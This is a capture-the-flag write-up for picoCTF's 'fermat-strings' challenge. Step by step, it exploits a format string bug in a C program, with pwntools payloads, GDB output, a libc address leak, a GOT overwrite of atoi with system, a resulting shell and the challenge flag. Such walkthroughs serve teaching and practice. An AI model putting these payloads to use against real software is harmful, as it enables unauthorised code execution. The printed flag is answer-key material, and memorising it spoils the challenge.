fermat-strings
12 minutes to read
We are given a 64-bit binary called chall
:
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
Static code analysis
We also have the C source code. Basically, what the program does is request two numbers and try to find one that breaks Fermat’s Last Theorem.
As a reminder, Fermat’s Last Theorem claims that there are no positive integers $a$, $b$, $c$, that satisfy the equation:
$$ a ^ n + b ^ n = z ^ n $$
For $n > 2$.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <math.h>
#define SIZE 0x100
void main(void) {
char A[SIZE];
char B[SIZE];
int a = 0;
int b = 0;
puts("Welcome to Fermat\\'s Last Theorem as a service");
setbuf(stdout, NULL);
setbuf(stdin, NULL);
setbuf(stderr, NULL);
printf("A: ");
read(0, A, SIZE);
printf("B: ");
read(0, B, SIZE);
A[strcspn(A, "\n")] = 0;
B[strcspn(B, "\n")] = 0;
a = atoi(A);
b = atoi(B);
if (a == 0 || b == 0) {
puts("Error: could not parse numbers!");
return 1;
}
char buffer[SIZE];
snprintf(buffer, SIZE, "Calculating for A: %s and B: %s\n", A, B);
printf(buffer);
int answer = -1;
for (int i = 0; i < 100; i++) {
if (pow(a, 3) + pow(b, 3) == pow(i, 3)) {
answer = i;
}
}
if (answer != -1) printf("Found the answer: %d\n", answer);
}
Format String vulnerability
On the source code we can see a Format String vulnerability:
snprintf(buffer, SIZE, "Calculating for A: %s and B: %s\n", A, B);
printf(buffer);
Because we can add format strings into buffer
which is the first argument of printf
. However, we need to enter a valid number in A
and B
:
printf("A: ");
read(0, A, SIZE);
printf("B: ");
read(0, B, SIZE);
A[strcspn(A, "\n")] = 0;
B[strcspn(B, "\n")] = 0;
a = atoi(A);
b = atoi(B);
But this is easy. Let’s try:
$ ./chall
Welcome to Fermat\'s Last Theorem as a service
A: 1.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x
B: 1
Calculating for A: 1.400bd8.97161728.0.ffffffff.97161350.0.0.97161580.1.78252e31.252e7825.2e78252e.78252e78.252e7825 and B: 1
As we can see, we can dump values from the stack. And also, the value of the format string starts at position 10 (offset 10):
$ ./chall
Welcome to Fermat\'s Last Theorem as a service
A: 1AAA%10$x
B: 1
Calculating for A: 1AAA41414131 and B: 1
Format String exploitation
The program will exit after we enter our input. We need to find a way of running again the program without stopping the process. This can be done using a the Format String vulnerability, because there is a format %n
that allows to write the number of bytes written until %n
into the address given as a parameter (the value of a position in the stack).
We notice that the binary has Partial RELRO, which means that the GOT is not writable during a Buffer Overflow exploitation, but it is writable via Format String. Hence, the idea is to change the value of an function in the GOT to point to main
and be able to rerun the program as a result.
$ gdb -q chall
Reading symbols from chall...
(No debugging symbols found in chall)
gef➤ break main
Breakpoint 1 at 0x40083b
gef➤ run
Starting program: ./chall
Breakpoint 1, 0x000000000040083b in main ()
Now we show the GOT entries:
gef➤ got
GOT protection: Partial RelRO | GOT functions: 9
[0x601018] puts@GLIBC_2.2.5 → 0x4006c6
[0x601020] __stack_chk_fail@GLIBC_2.4 → 0x4006d6
[0x601028] setbuf@GLIBC_2.2.5 → 0x4006e6
[0x601030] printf@GLIBC_2.2.5 → 0x4006f6
[0x601038] snprintf@GLIBC_2.2.5 → 0x400706
[0x601040] pow@GLIBC_2.2.5 → 0x400716
[0x601048] strcspn@GLIBC_2.2.5 → 0x400726
[0x601050] read@GLIBC_2.2.5 → 0x400736
[0x601058] atoi@GLIBC_2.2.5 → 0x400746
From the point where we have the printf
vulnerability, only pow
and printf
are called. We are not interested in changing printf
, so let’s modify the entry for pow
.
First, we are going to put the address in a position of the stack. Let’s use the input A
for entering the address and the input B
to extract it. But before, let’s do it with recognizable characters:
$ ./chall
Welcome to Fermat\'s Last Theorem as a service
A: 1234567.AAAABBBB
B: 1.%11$lx
Calculating for A: 1234567.AAAABBBB and B: 1.4242424241414141
Notice the use of %lx
to print an 8-byte value, and the position 11 because in position 10 we have 1234567.
.
Now, we can replace AAAABBBB
with the address of pow
at GOT. And instead of putting %11$lx
, we will put %11$n
. Let’s do it in a Python script with pwntools
and attach GDB to visualize the GOT entries:
payload_a = b'1234567.' + p64(pow_got)
payload_b = b'1.%11$n'
gdb.attach(p, gdbscript='break pow\ncontinue\ngot')
p.sendlineafter(b'A: ', payload_a)
p.sendlineafter(b'B: ', payload_b)
p.interactive()
If we run it, GDB will attach to it, break at pow
and then show the GOT:
gef➤ got
GOT protection: Partial RelRO | GOT functions: 9
[0x601018] puts@GLIBC_2.2.5 → 0x7f4c7b0845a0
[0x601020] __stack_chk_fail@GLIBC_2.4 → 0x4006d6
[0x601028] setbuf@GLIBC_2.2.5 → 0x7f4c7b08bc50
[0x601030] printf@GLIBC_2.2.5 → 0x7f4c7b061e10
[0x601038] snprintf@GLIBC_2.2.5 → 0x7f4c7b061ee0
[0x601040] pow@GLIBC_2.2.5 → 0x28
[0x601048] strcspn@GLIBC_2.2.5 → 0x7f4c7b1837b0
[0x601050] read@GLIBC_2.2.5 → 0x7f4c7b10e130
[0x601058] atoi@GLIBC_2.2.5 → 0x7f4c7b044730
Manual exploitation
The entry for pow
has changed to 0x28
(40). This means that until the %11$n
, we have printed 40 bytes. Since we have only 1.
before %11$n
, this means that there are 38 bytes in the stack before. If we put 1..
, then the GOT entry would change to 0x29
, and so on.
At this moment, we need to enter the address of main
(0x400837
, which is 4196407 in decimal) in the GOT entry. However, we cannot introduce this number of bytes because it is too large.
But we can make use of another format string. Since the address we need to be written is 4196407, then we must print 4196407 - 38 - 2 = 4196367 bytes. And this can be done with a format string like %4196367c
:
pow_got = 0x601040
payload_a = b'1234567.' + p64(pow_got)
payload_b = b'1.%4196367c' + b'%11$n'
p.sendlineafter(b'A: ', payload_a)
p.sendlineafter(b'B: ', payload_b)
p.interactive()
The computation of the number of bytes to write can be done as follows:
pow_got = 0x601040
bytes_on_stack = 38
bytes_to_print = main_addr - bytes_on_stack - 2
payload_a = b'1234567.' + p64(pow_got)
payload_b = f'1.%{bytes_to_print}c'.encode() + b'%11$n'
And it works, we have converted pow
into main
:
$ python3 solve.py
[+] Starting local process './chall': pid 389440
[*] Switching to interactive mode
Welcome to Fermat\'s Last Theorem as a service
A: $ 1
B: $ 1
Calculating for A: 1 and B: 1
Welcome to Fermat\'s Last Theorem as a service
A: $ 1
B: $ 1
Calculating for A: 1 and B: 1
Welcome to Fermat\'s Last Theorem as a service
A: $
Now we have more chances to continue with the exploitation. Next, we must leak an address of Glibc to obtain its version. The purpose of this is calculate the real address of system
and overwrite the GOT again for the final stage.
Obtaining memory leaks
To leak an address we can use the Format String vulnerability. For that, we must call printf
with a %s
format (strings in C are given as pointers) and pass a GOT entry (for example, puts
), so that the value inside the GOT entry is printed (it works like a pointer).
The strategy is similar: we will use the A
input to store the address of the GOT entry for puts
. And then we will put %11$s
in the B
input:
puts_got = 0x601018
payload_a = b'1234567.' + p64(puts_got)
payload_b = b'1.%11$s'
p.sendlineafter(b'A: ', payload_a)
p.sendlineafter(b'B: ', payload_b)
p.recvuntil(b'B: 1.')
puts_addr = u64(p.recvline().strip().ljust(8, b'\0'))
log.success(f'Leaked puts() address: {hex(puts_addr)}')
After that, we can compute the base address of Glibc, knowing the offset of puts
:
$ ldd chall
linux-vdso.so.1 (0x00007ffda1df7000)
libm.so.6 => /lib/x86_64-linux-gnu/libm.so.6 (0x00007f576d29c000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f576d0aa000)
/lib64/ld-linux-x86-64.so.2 (0x00007f576d3fe000)
$ readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep puts
194: 00000000000875a0 476 FUNC GLOBAL DEFAULT 16 _IO_puts@@GLIBC_2.2.5
429: 00000000000875a0 476 FUNC WEAK DEFAULT 16 puts@@GLIBC_2.2.5
504: 00000000001273c0 1268 FUNC GLOBAL DEFAULT 16 putspent@@GLIBC_2.2.5
690: 0000000000129090 728 FUNC GLOBAL DEFAULT 16 putsgent@@GLIBC_2.10
1158: 0000000000085e60 384 FUNC WEAK DEFAULT 16 fputs@@GLIBC_2.2.5
1705: 0000000000085e60 384 FUNC GLOBAL DEFAULT 16 _IO_fputs@@GLIBC_2.2.5
2342: 00000000000914a0 159 FUNC WEAK DEFAULT 16 fputs_unlocked@@GLIBC_2.2.5
puts_offset = 0x875a0
glibc_base_addr = puts_addr - puts_offset
log.success(f'Glibc base address: {hex(glibc_base_addr)}')
And with all these, we have leaked the address of puts
and the base address of Glibc:
$ python3 solve.py
[+] Starting local process './chall': pid 414163
[+] Leaked puts() address: 0x7f4a695695a0
[+] Glibc base address: 0x7f4a694e2000
[*] Switching to interactive mode
Welcome to Fermat\'s Last Theorem as a service
A: $
Now we can search for the offset of system
inside Glibc using:
$ readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep system
236: 0000000000156a80 103 FUNC GLOBAL DEFAULT 16 svcerr_systemerr@@GLIBC_2.2.5
617: 0000000000055410 45 FUNC GLOBAL DEFAULT 16 __libc_system@@GLIBC_PRIVATE
1427: 0000000000055410 45 FUNC WEAK DEFAULT 16 system@@GLIBC_2.2.5
The idea is to modify the GOT entry of a function that takes a controlled string as first argument so that it points to system
. For example, some candidates are atoi
and strcspn
. This time, we will be using atoi
, whose GOT entry address is 0x601058
.
atoi_got = 0x601058
system_offset = 0x55410
system_addr = glibc_base_addr + system_offset
GOT overwrite
Now we must write the real address of system
to the GOT entry of atoi
. Let’s enter 0 bytes and see the value in the GOT using GDB as before:
payload_a = b'1234567.' + p64(pow_got)
payload_b = b'1.%11$n'
gdb.attach(p, gdbscript='break atoi\ncontinue\ngot')
p.sendlineafter(b'A: ', payload_a)
p.sendlineafter(b'B: ', payload_b)
p.interactive()
If we run it, GDB will attach to it, break at atoi
and then show the GOT:
gef➤ got
GOT protection: Partial RelRO | GOT functions: 9
[0x601018] puts@GLIBC_2.2.5 → 0x7f660b8465a0
[0x601020] __stack_chk_fail@GLIBC_2.4 → 0x4006d6
[0x601028] setbuf@GLIBC_2.2.5 → 0x7f660b84dc50
[0x601030] printf@GLIBC_2.2.5 → 0x7f660b823e10
[0x601038] snprintf@GLIBC_2.2.5 → 0x7f660b823ee0
[0x601040] pow@GLIBC_2.2.5 → 0x400837
[0x601048] strcspn@GLIBC_2.2.5 → 0x7f660b9457b0
[0x601050] read@GLIBC_2.2.5 → 0x7f660b8d0130
[0x601058] atoi@GLIBC_2.2.5 → 0x7f6600000028
As it is shown, the entry for atoi
has a value of 0x7f6600000028
. With %11$n
we have overwritten the last 4 bytes (namely, 0x00000028
). Using the same procedure as before, we need to write a lot of bytes. The number of bytes to be entered in the format string can be computed as:
bytes_on_stack = 38
bytes_to_print = (system_addr - bytes_on_stack - 2) & 0xffffffff
We limit the number to 4 bytes just in case. And then we add it to the payload and send it:
bytes_to_print = (system_addr - bytes_on_stack - 2) & 0xffffffff
payload_a = b'1234567.' + p64(atoi_got) + p64(atoi_got + 2)
payload_b = f'1.%{bytes_to_print}c'.encode() + b'%11$n'
p.sendlineafter(b'A: ', payload_a)
p.sendlineafter(b'B: ', payload_b)
p.recvline()
p.interactive()
If everything is correct, the GOT entry for atoi
will be pointing to system
. An thus, we can enter /bin/sh
in A
or B
inputs to get a shell:
$ python3 solve.py
[+] Starting local process './chall': pid 502833
[+] Leaked puts() address: 0x7f4a096565a0
[+] Glibc base address: 0x7f4a095cf000
[*] Switching to interactive mode
Welcome to Fermat\'s Last Theorem as a service
A: $ /bin/sh
B: $
$ ls
chall chall.c Dockerfile solve.py
Alright. Let’s tweak the exploit a little bit to spawn a shell automatically:
p.sendlineafter(b'A: ', b'/bin/sh')
p.sendlineafter(b'B: ', b'')
p.recvuntil(b'B: ')
p.sendline()
p.interactive()
$ python3 solve.py
[+] Starting local process './chall': pid 507100
[+] Leaked puts() address: 0x7f6218d5b5a0
[+] Glibc base address: 0x7f6218cd4000
[*] Switching to interactive mode
$ ls
chall chall.c Dockerfile solve.py
Finding the remote Glibc version
However, we are not done yet. We must execute the exploit on the remote instance and get the version of Glibc. After that, we must update all the offsets.
To help with the version lookup, we can leak more function addresses of Glibc. For that, I decided to build a function called leak_address
as follows:
def leak_address(got_entry: int) -> int:
payload_a = b'1234567.' + p64(got_entry)
payload_b = b'1.%11$s'
p.sendlineafter(b'A: ', payload_a)
p.sendlineafter(b'B: ', payload_b)
p.recvuntil(b'B: 1.')
return u64(p.recvline().strip().ljust(8, b'\0'))
So that it is used this way:
atoi_got = 0x601058
atoi_addr = leak_address(atoi_got)
log.success(f'Leaked atoi() address: {hex(atoi_addr)}')
puts_got = 0x601018
puts_addr = leak_address(puts_got)
log.success(f'Leaked puts() address: {hex(puts_addr)}')
We run the exploit remotely and it does not work. No problem for the moment. Let’s check the leaked addresses:
$ python3 solve.py mars.picoctf.net 31929
[+] Opening connection to mars.picoctf.net on port 31929: Done
[+] Leaked atoi() address: 0x7f026a26c730
[+] Leaked puts() address: 0x7f026a2ac5a0
[+] Glibc base address: 0x7f026a225000
These are the Glibc versions found (their offsets are all the same):
We notice that the version of Glibc in the remote instance is the same that we were using locally.
However, the last stage of the exploit is not working remotely. This might be happening because we are writing a large amount of bytes in order to use %n
. A more elegant way is using %hhn
to write a single byte or %hn
to write 2 bytes.
Fixing the exploit
Let’s modify our payload to have a more stable exploit. For the moment we will be using %hn
. The last 2 bytes of the GOT entry can be overwritten in a similar way as before, just a few modifications:
bytes_to_print = ((system_addr & 0xffff) - bytes_on_stack - 2) % 0xffff
payload_a = b'1234567.' + p64(atoi_got) + p64(atoi_got + 2)
payload_b = f'1.%{bytes_to_print}c'.encode() + b'%11$hn'
payload_b += f'%12$hn'.encode()
gdb.attach(p, gdbscript='break atoi\ncontinue\ncontinue\ncontinue\ngot')
p.sendlineafter(b'A: ', payload_a)
p.sendlineafter(b'B: ', payload_b)
p.recvline()
p.interactive()
The first thing to notice is the use of the AND operators to get the last 2 bytes of the address of system
. And then the modulo operator to wrap around 0xffff
if the operation was negative. After that we use %11$hn
.
To overwrite the next 2 bytes, we need to put the address of the GOT entry for atoi
but plus 2 (because we want to write in the next 2 bytes). And hence, we must use %12$hn
. For now, let’s leave the second part blank (only %12$hn
).
We attach GDB to the process and show the GOT entries:
gef➤ got
GOT protection: Partial RelRO | GOT functions: 9
[0x601018] puts@GLIBC_2.2.5 → 0x7f70473075a0
[0x601020] __stack_chk_fail@GLIBC_2.4 → 0x4006d6
[0x601028] setbuf@GLIBC_2.2.5 → 0x7f704730ec50
[0x601030] printf@GLIBC_2.2.5 → 0x7f70472e4e10
[0x601038] snprintf@GLIBC_2.2.5 → 0x7f70472e4ee0
[0x601040] pow@GLIBC_2.2.5 → 0x400837
[0x601048] strcspn@GLIBC_2.2.5 → 0x7f70474067b0
[0x601050] read@GLIBC_2.2.5 → 0x7f7047391130
[0x601058] atoi@GLIBC_2.2.5 → 0x7f7054105410
Notice how the last 2 bytes were overwritten correctly (at least the last 3 hexadecimal digits match with 410
, which is the offset of system
). And also, we must take into account that the next 2 bytes have the same value as the last 2 bytes (5410
).
Knowing this, we can compute the number of bytes to write in order to place the correct number in that position:
bytes_to_print = ((system_addr & 0xffff) - bytes_on_stack - 2) % 0xffff
payload_a = b'1234567.' + p64(atoi_got) + p64(atoi_got + 2)
payload_b = f'1.%{bytes_to_print}c'.encode() + b'%11$hn'
bytes_to_print = (((system_addr >> 16) - system_addr) & 0xffff) % 0xffff
payload_b += f'%{bytes_to_print}c'.encode() + b'%12$hn'
p.sendlineafter(b'A: ', payload_a)
p.sendlineafter(b'B: ', payload_b)
p.recvline()
p.interactive()
And everything works smoothly locally:
$ python3 solve.py
[+] Starting local process './chall': pid 547640
[+] Leaked atoi() address: 0x7f05651e4730
[+] Leaked puts() address: 0x7f05652245a0
[+] Glibc base address: 0x7f056519d000
[*] Switching to interactive mode
$ ls
chall chall.c Dockerfile solve.py
Flag
Let’s see if it works remotely:
$ python3 solve.py mars.picoctf.net 31929
[+] Opening connection to mars.picoctf.net on port 31929: Done
[+] Leaked atoi() address: 0x7fc3974da730
[+] Leaked puts() address: 0x7fc39751a5a0
[+] Glibc base address: 0x7fc397493000
[*] Switching to interactive mode
$ ls
flag.txt
run
$ cat flag.txt
picoCTF{f3rm4t_pwn1ng_s1nc3_th3_17th_c3ntury}
The full exploit script can be found in here: solve.py
.